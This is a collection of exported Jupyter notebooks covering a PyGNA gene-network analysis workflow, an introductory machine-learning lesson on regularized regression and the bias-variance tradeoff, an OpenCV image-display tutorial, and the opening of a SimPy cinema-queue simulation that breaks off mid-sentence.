###Markdown PyGNA Workflow The workflow involves the following three steps1. Generate GMT files from CSV files in case GMT file isn't available2. Generate matrices3. Perform analysis for single or multiple genesets. Get the results in the form of pdf or png Data Loading Generating GMT files from a table This is when you have a table data from csv or Deseq. The following utlity can be used to generate gmt files from table data. ###Code $ pygna geneset-from-table <filename>.csv <setname> <filename>.gmt --name-colum <gene_names_column> --filter-column <filter-col> <'less'> --threshold <th> --descriptor <descriptor string> $ pygna geneset-from-table <deseq>.csv diff_exp <deseq>.gmt --descriptor deseq#for table from deseq ###Output _____no_output_____ ###Markdown Merging different Genesets It is also possible to merge different setnames in a single gmt file through the function generate-group-gmt. You can override the default parameters, to match the columns in your table.*generate-group-gmt* generates a GMT file of multiple setnames. From the table file, it groups the names in the group_col (the column you want to use to group them) and prints the genes in the name_col. Set the descriptor according to your needs. OR you could simply concatenate all the files. Computing rwr and sp matrices ###Code $ pygna build-distance-matrix <network> <network_sp>.hdf5 $ pygna build-rwr-diffusion <network> --output-file <network_rwr>.hdf5 ###Output _____no_output_____ ###Markdown Topology Tests ###Code $ pygna test-topology-module <network> <geneset> <table_results_test>_topology_module.csv --number-of-permutations 100 --cores 4 $ pygna test-topology-rwr <network> <geneset> <network_rwr>.hdf5 <table_results_test>_topology_rwr.csv --number-of-permutations 100 --cores 4 $ pygna test-topology-internal-degree <network> <geneset> <table_results_test>_topology_internal_degree.csv --number-of-permutations 100 --cores 4 $ pygna test-topology-sp <network> <geneset> <network_sp>.hdf5 <table_results_test>_topology_sp.csv --number-of-permutations 100 --cores 4 $ pygna test-topology-total-degree <network> <geneset> <table_results_test>_topology_total_degree.csv --number-of-permutations 100 --cores 4 ###Output _____no_output_____ ###Markdown Association tests If only A_geneset_file is passed the analysis is run on all the pair of sets in the file, if both A_geneset_file and B_geneset_file are passed, one can specify the setnames for both, if there is only one geneset in the file, setname_X can be omitted, if both sets are in the same file, B_geneset_file can be not specified, but setnames are needed ###Code pygna test-association-rwr [-h] [--setname-a SETNAME_A] [--file-geneset-b FILE_GENESET_B] [--setname-b SETNAME_B] [--size-cut SIZE_CUT] [-k] [-c CORES] [-i] [--number-of-permutations NUMBER_OF_PERMUTATIONS] [--n-bins N_BINS] [--results-figure RESULTS_FIGURE] network-file file-geneset-a rwr-matrix-filename output-table Performs comparison of network location analysis. It computes a p-value for the shortest path distance between two genesets being smaller than expected by chance. If only A_geneset_file is passed the analysis is run on all the pair of sets in the file, if both A_geneset_file and B_geneset_file are passed, one can specify the setnames for both, if there is only one geneset in the file, setname_X can be omitted, if both sets are in the same file, B_geneset_file can be not specified, but setnames are needed. positional arguments: network-file network file file-geneset-a GMT geneset file rwr-matrix-filename .hdf5 file with the RWR matrix obtained by pygna output-table output results table, use .csv extension optional arguments: -h, --help show this help message and exit --setname-a SETNAME_A Geneset A to analyse (default: -) --file-geneset-b FILE_GENESET_B GMT geneset file (default: -) --setname-b SETNAME_B Geneset B to analyse (default: -) --size-cut SIZE_CUT removes all genesets with a mapped length < size_cut (default: 20) -k, --keep if true, keeps the geneset B unpermuted (default: False) -c CORES, --cores CORES Number of cores for the multiprocessing (default: 1) -i, --in-memory set if you want the large matrix to be read in memory (default: False) --number-of-permutations NUMBER_OF_PERMUTATIONS number of permutations for computing the empirical pvalue (default: 500) --n-bins N_BINS if >1 applies degree correction by binning the node degrees and sampling according to geneset distribution (default: 1) --results-figure RESULTS_FIGURE heatmap of results (default: -) $ pygna test-association-sp <network> <geneset> <network_sp>.hdf5 <table_results_test>_association_sp.csv -B <geneset_pathways> --keep --number-of-permutations 100 --cores 4 $ pygna test-association-rwr <network> <geneset> <network_rwr>.hdf5 <table_results_test>_association_rwr.csv -B <geneset_pathways> --keep --number-of-permutations 100 --cores 4 ###Output _____no_output_____ ###Markdown Visualisation ###Code Usage: pygna paint-datasets-stats [-h] [-a ALTERNATIVE] table-filename output-file #GNT barplot Usage: pygna paint-summary-gnt [-h] [-s SETNAME] [-t THRESHOLD] [-c COLUMN_FILTER] [--larger] [--less-tests LESS_TESTS] output-figure [input_tables [input_tables ...]]#GNT Summary Usage: pygna paint-comparison-matrix [-h] [-r] [-s] [-a] table-filename output-file#heatmap Usage: pygna paint-volcano-plot [-h] [-r] [-i ID_COL] [--threshold-x THRESHOLD_X] [--threshold-y THRESHOLD_Y] [-a] table-filename output-file#volcanoplot ###Output _____no_output_____ ###Markdown Snakemake Workflow 1) Install Snakemake2) Make changes to the config file and rules files accordingly(changing the path/parameters etc)3) Run the analysisAll the steps from above are boiled down to one or two steps. ###Code snakemake --use-conda -n#dry run snakemake --snakefile Snakefile_paper --configfile config_paper --use-conda --cores $N#to replicate the results of the paper ###Output _____no_output_____ ###Markdown To obtain all the results for the single geneset (avoid the first step to have the full regeneration of all files): ###Code snakemake snakemake --snakefile Snakefile_paper single_all --configfile config_paper_single.yaml -t snakemake --snakefile Snakefile_paper single_all --configfile config_paper_single.yaml --use-conda ###Output _____no_output_____ ###Markdown To obtain the results for the multi geneset ###Code snakemake snakemake --snakefile Snakefile_paper multi_all --configfile config_paper_multi.yaml -t snakemake --snakefile Snakefile_paper multi_all --configfile config_paper_multi.yaml ###Output _____no_output_____ ###Markdown Paper Use Case Using Commandline Since the distance matrices are already built and the merged geneset(gmt) already obtained, topology and association analysis can be carried out directly. **Topology Analysis** ###Code #file names: biogrid_3.168_filtered.tsv merged.gmt goslim.gmt interactome_RWR.hdf5 interactome_SP.hdf5 cd /home/gee3/Documents/PyGNA/data_tcga_workflow/external/ ! pygna test-topology-module biogrid_3.168_filtered.tsv merged.gmt table_topology_module3.csv --number-of-permutations 100 --cores 2 ! pygna test-topology-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 tableresults_topology_rwr.csv --number-of-permutations 10 --cores 3 ! pygna test-topology-internal-degree biogrid_3.168_filtered.tsv merged.gmt table_topology_internal_degree.csv --number-of-permutations 10 --cores 3 ! pygna test-topology-sp biogrid_3.168_filtered.tsv merged.gmt interactome_SP.hdf5 table_topology_sp.csv --number-of-permutations 10 --cores 2 ! pygna test-topology-total-degree biogrid_3.168_filtered.tsv merged.gmt table_topology_total_degree.csv --number-of-permutations 100 --cores 4 ###Output _____no_output_____ ###Markdown **Association Tests** In a GNA two genesets are tested for their association. When testing a signle geneset against many pathways it is recommended the –keep flag is used. This way, while resampling only the geneset a will be randomly permuted and the geneset b is going to be kept as it is. This strategy is more conservative and is helpful in testing whether the tested geneset is more strongly connected to the pathway (or any other geneset of interest) than expected by chance. ###Code ! pygna test-association-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_association_rwr.csv --file-geneset-b goslim_entrez.gmt --keep --number-of-permutations 100 --cores 4 ###Output _____no_output_____ ###Markdown If you don't include the --results-figure flag at the comparison step, plot the matrix as follows ###Code ! pygna paint-comparison-matrix table_association_rwr.csv heatmap_association_rwr.png --rwr --annotate ###Output _____no_output_____ ###Markdown If setname B is not passed, the analysis is run between each couple of setnames in the geneset as follows(The only difference between single geneset and multiple genests. No within comprison in multi): ###Code ! pygna test-association-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_within_comparison_rwr.csv --number-of-permutations 100 --cores 2 ! pygna paint-comparison-matrix table_within_comparison_rwr.csv heatmap_within_comparison_rwr.png --rwr --single-geneset ! pygna test-association-sp biogrid_3.168_filtered.tsv merged.gmt interactome_SP.hdf5 table_association_SP.csv --file-geneset-b goslim_entrez.gmt --keep --number-of-permutations 2 --cores 1 ! pygna paint-comparison-matrix table_association_sp.csv heatmap_association_sp.png --rwr --annotate#default heatmap ! pygna test-association-sp biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_within_comparison_sp.csv --number-of-permutations 2 --cores 2 ! pygna paint-comparison-matrix table_within_comparison_sp.csv heatmap_within_comparison_rwr.png --rwr --single-geneset ###Output _____no_output_____ ###Markdown **Diagnostic** Distribution plotWhen running a statistical test, one might want to visually assess the null distribution. By passing -d \ through command line, a distribution plot of the empirical null is shown for each test. ###Code ! pygna test-topology-total-degree biogrid_3.168_filtered.tsv merged.gmt diagnstic_total_degree.csv -d "diagnostic/" --number-of-permutations 2 --cores 2 ###Output _____no_output_____ ###Markdown **Visualisation** There are four main types of figures currently implemented in PyGNA, namely bar plots, point plots, heatmaps and volcano plots, to visualize to GNT and GNA results.Barplots are used to plot the GNT results for a single statistic. For each geneset a red bar represents the observed statistic, whereas a blue one represents the average of the empirical null distribution. Conversely, a dot plot can be used to summarize multiple tests for the same geneset. In order to show all the results in the same figure, the observed values are transformed in absolute normalized z-scores, such that all significant tests have z-score >0 and are marked with a red dot. GNA results can instead be visualised on heatmaps, with the color gradients used to report the strength of association between two genesets. When an all-vs-all test is conducted, a lower triangular matrix is shown, with stars denoting significance. If, instead, a M-vs-N test was conducted, a complete heatmap would be included in the plot.Alternatively, volcano plots can be used to visualize one-vs-many GNA results, for testing a geneset against a large number of datasets (e.g. gene ontologies). The plot shows the normalized z-score on the x-axis and the −log10 of the p-value adjusted to control the False Discovery Rate (FDR) on the y-axis. Significant results are shown with red crosses, whereas not significant associations are represented by blue dots.Can be annotated to fid out the top 5 terms. ###Code ! pygna paint-datasets-stats table_topology_module.csv gnt_tm.png #GNT barplot ! pygna paint-summary-gnt dotplt.png #GNT Summary ! pygna paint-comparison-matrix table_association_sp.csv withncomp_sp.pdf #heatmap ! pygna paint-volcano-plot table_association_sp.csv volcno_sp.png #volcanoplot ###Output _____no_output_____ ###Markdown **Benchmarking** GNT and GNA benchmarking using SBM ###Code ! pygna generate-gnt-sbm "benchmarking/gnt_sbm.tsv" 'benchmarking/gnt_sbm.gmt' ! pygna generate-gna-sbm "benchmarking/gna_sbm.tsv" 'benchmarking/gna_sbm.gmt' ###Output [50, 50, 50, 50, 50, 50, 700] INFO:root:Network written on benchmarking/gnt_sbm.tsv [50, 50, 50, 50, 50, 50, 50, 50, 600] INFO:root:Network written on benchmarking/gna_sbm.tsv Generatedbenchmarking/gna_sbm.tsv ###Markdown GNT and GNA benchmarking using SBM ###Code ! pygna generate-hdn-network benchmarking/ hdn_network ###Output INFO:root:Reject=True INFO:root:Reject=True INFO:root:Nodes: 1000, in LCC: 999 INFO:root:Reject=True INFO:root:Nodes: 1000, in LCC: 999 INFO:root:Reject=True INFO:root:Nodes: 1000, in LCC: 999 INFO:root:Reject=False INFO:root:Nodes: 1000, in LCC: 1000 INFO:root:Network written on benchmarking/hdn_network_s_0_network.tsv INFO:root:Reject=True INFO:root:Reject=False INFO:root:Nodes: 1000, in LCC: 1000 INFO:root:Network written on benchmarking/hdn_network_s_1_network.tsv INFO:root:Reject=True INFO:root:Reject=False INFO:root:Nodes: 1000, in LCC: 1000 INFO:root:Network written on benchmarking/hdn_network_s_2_network.tsv INFO:root:Reject=True INFO:root:Reject=True INFO:root:Nodes: 1000, in LCC: 999 INFO:root:Reject=False INFO:root:Nodes: 1000, in LCC: 1000 INFO:root:Network written on benchmarking/hdn_network_s_3_network.tsv INFO:root:Reject=True INFO:root:Reject=False INFO:root:Nodes: 1000, in LCC: 1000 INFO:root:Network written on benchmarking/hdn_network_s_4_network.tsv ###Markdown Given the generated network and node list of HDNs, novel genesets made of mixtures of the two can be generate.The original network with a number of HDNs, then the partial, extended, and branching genesets can be generated. **Adding Extended Genesets** Creates new genesets from the vip list, number of genesets and portion of genes can be specified by input. The final new geneset is going to be formed by: percentage ev * HDN_total + ratio* percentage ev*vips total. ###Code !pygna hdn-add-extended input-geneset-file#Genesets are input to identify ###Output _____no_output_____ ###Markdown **Adding Partial Genesets**Creates new genesets from the vip list, number of genesets and portion of genes can be specified by input. ###Code !pygna hdn-add-partial input-geneset-file ###Output _____no_output_____ ###Markdown **Adding Branching Genesets** Creates new genesets from the vip list, new genesets are created adding 1 step nodes to vips. The new genes are created as branches. ###Code !pygna hdn-add-branching input-geneset-file ###Output _____no_output_____
part1 - intro to ML/intro_to_ML.ipynb
###Markdown Welcome to Supervised Learning Part 1: Introduction to machine learning and the bias-variance tradeoff Instructor: Andras Zsom https://github.com/azsom/Supervised-Learning The topic of the course series: supervised Machine Learning (ML)- how to build an ML pipeline from beginning to deployment- we assume you already performed data cleaning- this is the first course out of 6 courses - **Part 1: Introduction to machine learning and the bias-variance tradeoff** - Part 2: How to prepare your data for supervised machine learning - Part 3: Evaluation metrics in supervised machine learning - Part 4: SVMs, Random Forests, XGBoost - Part 5: Missing data in supervised ML - Part 6: Interpretability- you can complete the courses in sequence or complete individual courses based on your interest Tools- we use python - pros: easy to use for a beginner programmer - cons: it is very difficult to write computationally efficient code - the divide between users and developers of python packages are wide- packages we use: sklearn, pandas, numpy, matplotlib, XGBoost, SHAP- if you are a python user, you need to know exactly what you are doing - carefully read the manual, work through the examples, test every line of code you write - good test of your understanding: could I write the function/method myself if I had to? - do not assume your code works, always test everything - there are two types of errors: - one that gives an error message - usually easy to fix - the error message tells you in which line the error occurs - read and understand the error message - if it's not obvious what the error is, read more on it on stackoverflow for example - sneaky errors without error message - these are tough! - your code runs and it gives some output but something is off - just staring at the code won't reveal the bug - print print print or use a debugger - check every line of code, trace issues through the code - to reduce the number of errors/bugs, do test-driven code development - first think about what the output of a function call/cell/piece of a piece of code should be - only then write the code - check if you got the expected output Learning objectives of this courseBy the end of the course, you will be able to- describe how a task like spam filtering can be solved with explicit coding instructions vs. a machine learning algorithm that learns from examples (training data),- summarize the similarities and differences between supervised and unsupervised ML,- list the pros and cons of supervised machine learning,- define the mathematical model behind linear and logistic regression,- explain what the loss function is,- describe the two main types of regularization and why it is important,- perform a simple train/validation/test split on IID data,- apply linear and logistic regression to datasets,- tune the regularization hyperparameter,- identify models with high bias and high variance,- select the best model and measure its performance on a previously unseen dataset, the test set. Module 1: Intro to Machine Learning Learning objectives of this module:- describe how a task like spam filtering can be solved with explicit coding instructions vs. a machine learning algorithm that learns from examples (training data),- summarize the similarities and differences between supervised and unsupervised ML,- list the pros and cons of supervised machine learning, Supervised ML- supervised ML is probably the most successful area in ML (based on economic value created) - **online advertising**: given an ad and user info, will the user click on the ad? - **real estate**: given home features, can we predict the house price? - **finance**: given an applicant and a finalcial product (e.g., a loan), will this applicant be able to successfully pay back the loan? - **health care**: given a patient, symptoms, and maybe test results, can we predict the illness? - ...- supervised ML pros: - **automation**: computers perform calculations faster than humans (and computers are cheaper) - **learn from examples**: no need to explicitly tell the computer what to do. the computer figures out what to do based on examples (data)- supervised ML con: - it can be difficult or labor-intensive to collect training data - there is no guarantee that you will be able to develop an accurate model based on the data you have Example: spam filters- Traditional coding pipeline with explicit instructions Example: spam filters- ML pipeline - the data: feature matrix (X) and target variable (Y) - X can be structured (tabular data most commonly stored in excel and csv files or SQL databases) - X can be unstructured (e.g., images, text, voice recording, video) - Y can be categorical, the problem is **classification** (e.g., click or not click on an ad, sick or not sick) - Y can be continuous, the problem is **regression** (e.g., predict house price, stock price, age) - Y can be missing, the problem is **clustering**- **we focus on structured data during the course series!** Structured data| X|feature_1|feature_2|...|feature_j|...|feature_m|Y||-|:-:|:-:|:-:|:-:|:-:|:-:|:-:||__data_point_1__|x_11|x_12|...|x_1j|...|x_1m|__y_1__||__data_point_2__|x_21|x_22|...|x_2j|...|x_2m|__y_2__||__...__|...|...|...|...|...|...|__...__||__data_point_i__|x_i1|x_i2|...|x_ij|...|x_im|__y_i__||__...__|...|...|...|...|...|...|__...__||__data_point_n__|x_n1|x_n2|...|x_nj|...|x_nm|__y_n__| Other areas of ML- unsupervised ML - only the feature matrix X is available, there is no target variable - the goal is to find structure (clusters) in the data - often used in customer segmentation- recommender systems - recommend products to a customer based on what products similar customers enjoyed- reinforcement learning - the learning system, called an agent, can observe the environment, select and perform actions, and get rewards and penalties in return. Goal: come up with strategy to maximize rewards - often used when virtual environment is available (e.g., games like go or warcraft) - sounds appealing to use in real environments (like self-driving cars) but agents learn slow, lots of cars would need to be broken to teach an agent to drive this way - deep learning - uses neural networks and often works with unstructured data - technically deep learning is supervised or unsupervised - extremely successful on large datasets Module 2: Overview of linear and logistic regression with regularization Learning objectives of this module:- define the mathematical model behind linear and logistic regression,- explain what the loss function is,- describe the two main types of regularization and why it is important, Supervised ML algorithms: three parts- 1) **a mathematical model ($f$)** is used to convert the feature values into a prediction$f(X_i) = y_i'$, where $i$ is the $i$th data point in our sample. $X_i$ is a vector and $y_i'$ is a number. - $f$ is your supervised ML algorithm - it usually has a number of intrinsic parameters - 2) **an optimization algorithm** is used to determine the intrinsic parameter values given the training set - there are various algorithms - e.g., gradient descent, backpropagation- 3) the optimization algorithm minimizes a metric called **the cost function** - the cost function is used to determine the best intrinsic parameters of one model based on the training data Linear Regression ###Code # these lines are just illustration # no X_train or y_train are defined yet so it won't run from sklearn.linear_model import LinearRegression # import the model LinReg = Linear_Regression() # initialize a simple linear regression model LinReg.fit(X_train,y_train) # we will learn now what happens when you issue this line ###Output _____no_output_____ ###Markdown - This is the **mathematical model**: $f(X_i) = y_i' = \theta_0 + X_{i1} \theta_1 + X_{i2} \theta_2 +$ ... $= \theta_0 + \sum_{j=1}^{m} \theta_j X_{ij} $,where $y_i'$ is the prediction of the linear regression model and $\theta$ are parameters.- The **optimization algorithm** is some form of gradient descent - we won't go into detail but the basic idea is that gradient descent will find the $\theta$ values that minimize the cost function on the training data- The **cost function** is MSE - mean squared error $MSE(y,y') = \frac{1}{n}\sum_{i=1}^{n}(y_i'-y_i)^2$ Logistic Regression ###Code from sklearn.linear_model import LogisticRegression LogReg = LogisticRegression() # initialize a simple logistic regression model LogReg.fit(X_train,y_train) # we will learn what happens when you issue this line in classification ###Output _____no_output_____ ###Markdown - name is misleading, logistic regression is for classification problems!- the model:$f(X_i) = y_i' = \frac{1}{1+e^{-z}}$, where$z = \theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}$- $f(z) = \frac{1}{1+e^{-z}}$ is the sigmoid function which maps real values to be between 0 and 1 such that the real value 0 is mapped to 0.5. - the output of a sigmoid function can be thought of as a predicted probability. ###Code import numpy as np import matplotlib.pyplot as plt def sigmoid(z): return 1/(1+np.exp(-z)) z = np.linspace(-7,7,50) print(z) plt.plot(z,sigmoid(z)) plt.xlabel('input of linear regression') plt.ylabel('predicted probability') plt.title('sigmoid transformation') plt.savefig('figures/sigmoid_trans.png',dpi=300) plt.show() ###Output [-7. -6.71428571 -6.42857143 -6.14285714 -5.85714286 -5.57142857 -5.28571429 -5. -4.71428571 -4.42857143 -4.14285714 -3.85714286 -3.57142857 -3.28571429 -3. -2.71428571 -2.42857143 -2.14285714 -1.85714286 -1.57142857 -1.28571429 -1. -0.71428571 -0.42857143 -0.14285714 0.14285714 0.42857143 0.71428571 1. 1.28571429 1.57142857 1.85714286 2.14285714 2.42857143 2.71428571 3. 3.28571429 3.57142857 3.85714286 4.14285714 4.42857143 4.71428571 5. 5.28571429 5.57142857 5.85714286 6.14285714 6.42857143 6.71428571 7. ] ###Markdown - The **optimization algorithm** is some form of gradient descent- the logloss metric is used as a **cost function** in logistic regression$L(\theta) = - \frac{1}{N}\sum_{i=1}^{n} [y_i\ln(y_i') + (1-y_i)\ln(1-y_i')]$ - two scenarios: - y_i = 0 - left term disappears - y_i = 1 - right term disappears- log(0) is undefined - $y_i'$ is usually replaced with $\max(\min(y_i',1-10^{-15}),10^{-15})$ to avoid this issue**The extreme cases**- the classifier is confidently wrong - $y_i' = 10^{-15}$ for points in class 1 - $y_i' = 1 - 10^{-15}$ for points in class 0$logloss = -\frac{1}{N}\sum \ln(10^{-15}) = -\ln(10^{-15})$ $logloss \sim 34.5 $- the classifier is correct - $y_i' = 10^{-15}$ for points in class 0 - $y_i' = 1 - 10^{-15}$ for points in class 1$logloss = -\frac{1}{N}\sum (1-0)(1-\ln(1-10^{-15})) = 10^{-15}$ for class 0$logloss = -\frac{1}{N}\sum 1*\ln(1-10^{-15}) = 10^{-15}$ for class 1$logloss \sim 0$- the logloss metric also needs to be minimized Regularization- models tend to overfit on the training data and such models don't perform well on previously unseen points - a sure sign of overfitting in linear and logistic regression is huge theta values, much larger than the typical ranges of your features and target variable - overfitting means that the model fits the noise rather than the underlying structure - e.g., fitting a high degree polinomial to a roughly linearly correlated set of points- one way to address this shortcoming of ML models is regularization- let's change the cost function and add a penalty term for large thetas- **Lasso regression**: regularize using the l1 norm of theta: $L(\theta) =$ original cost $+ \color{red}{ \frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$ - **Ridge regression**: regularize using the l2 norm of theta: $L(\theta) =$ original cost $+ \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$- $\alpha$ is the regularization parameter (0 or larger), it describes how much we penalize large thetas Regulariztion in linear regression- the original cost function is MSE and we add the penalty term- **Lasso regression**: regularize using the l1 norm of theta: $L(\theta) = \frac{1}{n}\sum_{i=1}^{n}[(\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}- y_i)^2] + \color{red}{ \frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$ - **Ridge regression**: regularize using the l2 norm of theta: $L(\theta) = \frac{1}{n}\sum_{i=1}^{n}[(\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}- y_i)^2] + \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$ Regulariztion in logistic regression- the original cost is logloss and we add the penalty term- **Lasso regression**: regularize using the l1 norm of theta:$L(\theta) = - \frac{1}{N}\sum_{i=1}^{n} [y_i\ln(\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}) + (1-y_i)\ln(1-\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}))] + \color{red}{ \frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$- **Ridge regression**: regularize using the l2 norm of theta:$L(\theta) = - \frac{1}{N}\sum_{i=1}^{n} [y_i\ln(\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}) + (1-y_i)\ln(1-\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}))] + \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$ Let's translate these concepts to code in the next module! Module 3: The bias-variance tradeoff Learning objectives of this module:- perform a simple train/validation/test split on IID data,- apply linear and logistic regression to datasets,- tune the regularization hyperparameter,- identify models with high bias and high variance,- select the best model and measure its performance on a previously unseen dataset, the test set. ###Code # STEP 1: read in the data # https://www4.stat.ncsu.edu/~boos/var.select/diabetes.html # IID - independent and identically distributed dataset import pandas as pd df = pd.read_csv('https://www4.stat.ncsu.edu/~boos/var.select/diabetes.tab.txt',delimiter='\t') print(df.head()) # separate out the feature matrix and the target variable y = df.iloc[:,-1] # the last column is the target variable X = df.iloc[:,:-1] # all but the last column are the features print(y.head()) print(X.head()) # STEP 2: split the data from sklearn.model_selection import train_test_split X_other, X_test, y_other, y_test = train_test_split(X,y,test_size=0.2,random_state=1) X_train, X_val, y_train, y_val = train_test_split(X_other,y_other,test_size=0.25,random_state=1) # verify the results print(X_train.shape) # 60% for training print(X_val.shape) # 20% for validation print(X_test.shape) # 20% for testing # STEP 3: preprocess the data from sklearn.preprocessing import StandardScaler scaler = StandardScaler() # initialize the scaler X_train_prep = scaler.fit_transform(X_train) X_val_prep = scaler.transform(X_val) X_test_prep = scaler.transform(X_test) # the _prep objects are now numpy arrays # let's verify that all feature means are 0 and stds are 1 print(np.mean(X_train_prep,axis=0)) print(np.std(X_train_prep,axis=0)) print(np.mean(X_val_prep,axis=0)) # not exactly 0 print(np.std(X_val_prep,axis=0)) # not exactly 1 print(np.mean(X_test_prep,axis=0)) # not exactly 0 print(np.std(X_test_prep,axis=0)) # not exactly 1 # STEP 4: # train linear regression models # tune the regularization parameter # calculate and visualize train and validation scores # select the model that performs best on the validation set # calculate the generalization error using the test set from sklearn.linear_model import Lasso from sklearn.metrics import mean_squared_error alphas = np.logspace(-2,2,13) print(alphas) train_scores = [] val_scores = [] models = [] for alpha in alphas: # initialize the model linreg = Lasso(alpha=alpha) # fit it to the training set linreg.fit(X_train_prep,y_train) # save the model models.append(linreg) # calculate and save train score y_train_pred = linreg.predict(X_train_prep) train_score = mean_squared_error(y_train,y_train_pred,squared=False) train_scores.append(train_score) # calculate and save val score y_val_pred = linreg.predict(X_val_prep) val_score = mean_squared_error(y_val,y_val_pred,squared=False) val_scores.append(val_score) # let's visualize the train and validation scores plt.plot(alphas,train_scores,label='train score') plt.plot(alphas,val_scores,label='validation score') plt.xlabel('regularization strength (alpha)',fontsize=13) plt.ylabel('RMSE',fontsize=13) plt.semilogx() plt.legend(fontsize=13) plt.savefig('figures/bias-variance.png',dpi=300) plt.show() ###Output [1.00000000e-02 2.15443469e-02 4.64158883e-02 1.00000000e-01 2.15443469e-01 4.64158883e-01 1.00000000e+00 2.15443469e+00 4.64158883e+00 1.00000000e+01 2.15443469e+01 4.64158883e+01 1.00000000e+02] ###Markdown The bias-variance tradeoff- high alpha (strong regularization): - the model is too simple - it performs poorly on both the training and validation sets (RMSEs are large) - high bias or low variance model- low alpha (weak regularization) - the model is too complex - it performs very well on the training set but it performs comparatively poorly on the validation set - low bias or high variance model- we are looking for the sweet spot in between - if your evaluation metric needs to be minimized (e.g., MSE, RMSE, logloss) - select the alpha with the smallest validation score - the corresponding model is the best - if your evaluation metric needs to be maximized (e.g., accuracy, R2) - select the alpha with the largest validation score - the corresponding model is the best Let's select the best model and calculate the generalization error ###Code indx = np.argmin(val_scores) print('best alpha:',alphas[indx]) # the best alpha value print('best validation score:',val_scores[indx]) # the validation score final_model = models[indx] # pull out the best model y_test_pred = final_model.predict(X_test_prep) gen_error = mean_squared_error(y_test,y_test_pred,squared=False) print('the generalization error:',gen_error) # the error we expect from the model on previously unseen data ###Output best alpha: 2.154434690031882 best validation score: 57.4873819354221 the generalization error: 54.72060685174691
00_Introduction_OpenDisplayImages.ipynb
###Markdown *This notebook is a part of a series, [Learning image manipulation in Python](find), that covers the basics of working with images in [OpenCV](https://docs.opencv.org/), [Matplotlib](https://matplotlib.org/users/index.html) and [Numpy](https://numpy.org/doc/).* Introduction: Opening and displaying images Installing librariesWe will primarily be working with OpenCV(cv2) for working with images.Installed openCV in Anaconda from here: https://anaconda.org/conda-forge/opencv`conda install -c conda-forge opencv` ###Code from matplotlib import pyplot as plt import cv2 print( cv2.__version__) ###Output 3.4.2 ###Markdown Loading imagesYou can use `cv2.imread()` to load an image file. ###Code image = cv2.imread("images/rgb.jpg") # Remember shape returns a tupple with the number of rows(height) first height, width, channels = image.shape print('%d high by %d wide with %d channels' % (height, width, channels)) ###Output 512 high by 512 wide and 3 channels ###Markdown Displaying imagesYou can use `matplotlib.pyplot` (referenced here as `plt`) to display the image. Note that cv2 orders the color channels blue, green then red and matplotlib uses red, green then blue. To address this you can use `cv2.cvtColor()` to change the order before di}splay.You can use `axis()` and `title()` methods of pyplot to adjust the appearance. ###Code imageRGB = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # Display original image using matplotlib plt.imshow(image) plt.axis('off') plt.title('Incorrect (BGR image)') plt.show() # Display converted image using matplotlib plt.imshow(imageRGB) plt.axis('off') plt.title('Correct (RGB image)') plt.show() ###Output _____no_output_____ ###Markdown Loading images from URLThe openCV `cv2.imread()` method is able to read directly from a URL, but scikit-image (skimage) libraries `io.imread()` method is. This method load an image in RGB channel order so no conversion is needed. ###Code from skimage import io url = 'https://github.com/Algorithmic-Lens/Learning-image-manipulation-in-Python/raw/master/images/rgb.jpg' remoteImage = io.imread(url) # Display image using matplotlib plt.imshow(remoteImage) plt.axis('off') plt.title('Correct (RGB image)') plt.show() ###Output 512 by 512 pixels and 3 channels
src/simpy/cinema_example (realpython).ipynb
###Markdown Table of ContentsExample - Cinema SimulationDefine the problemBrainstorm the algorithmDefine librariesCode: class definitionDefine the functionRun the simulation Example - Cinema SimulationSimulating Real-World Processes in Python with SimPyWork through another example of using SimPy from [realpython.com](https://realpython.com/simpy-simulating-with-python/) Define the problemThe first step of running a simulation is to choose to process a model. In this example, we will imagine we are consulting for a small cinema chain, who have bad reviews due to long waiting times. The company has done some research, and found out that the average customer is willing to wait for at most **10 minutes** between arriving at the venue, and wanting to be sat down. Therefore, the problem has been formulated as helping to **get wait times below 10 minutes**. Brainstorm the algorithmBefore approaching the problem from a coding perspective, first work out how the process will work in real life. This will ensure that the code is an accurate reflection of what happens in real life. First, list the possible steps someone who visits the cinema would face.Steps on entering a cinema:1. **Arrive** at venue2. **Queue** to buy ticket3. **Buy** ticket4. **Queue** to get ticket checked 5. **Get** ticket checked6. Decided whether to get drinks/food: - If yes, **purchase drinks/food** - If no, go to the last step7. **Go** directly to the seatNow we have defined the steps above, we can see which parts of the process can be controlled by the cinema chain itself. An example would be how long a customer waits before buying their ticket or drinks/food, and this can be controlled by the number of staff serving these customers.There are parts of the process that cannot be controlled, such as when the customers are arriving at the venue, or in what volume they will arrive. Since we cannot accurately guess this number, this parameter will have to be filled with available data to determine an appropriate arrival time. Define libraries ###Code import random import statistics import simpy print(simpy.__version__) ###Output 4.0.1 ###Markdown The goal is to find the optimal number of employees giving an average wait time of **less than 10 minutes**. To define and solve this problem, we will collect a list of waiting times for each customer, from when they enter the venue to when they sit down. ###Code waiting_times = [] ###Output _____no_output_____ ###Markdown Code: class definition Build the blueprint for the system, the environment in which the events will happen, such as people moving from one place to another. The environment is the name of the class. ###Code class Cinema(object): def __init__(self, env): self.env = env ###Output _____no_output_____ ###Markdown Consider what might be in the Cinema to add to the simulation. As outlined in the steps above, there will be: - staff to sell tickets/refreshments (drinks/food) - staff can sell the above items Therefore, from the cinema's perspective, the staff are a **resource** who assist the customers in **purchasing items**.Therefore, we frame the problem as how does the waiting time change depending on the number of customers in each simulation?So, the next 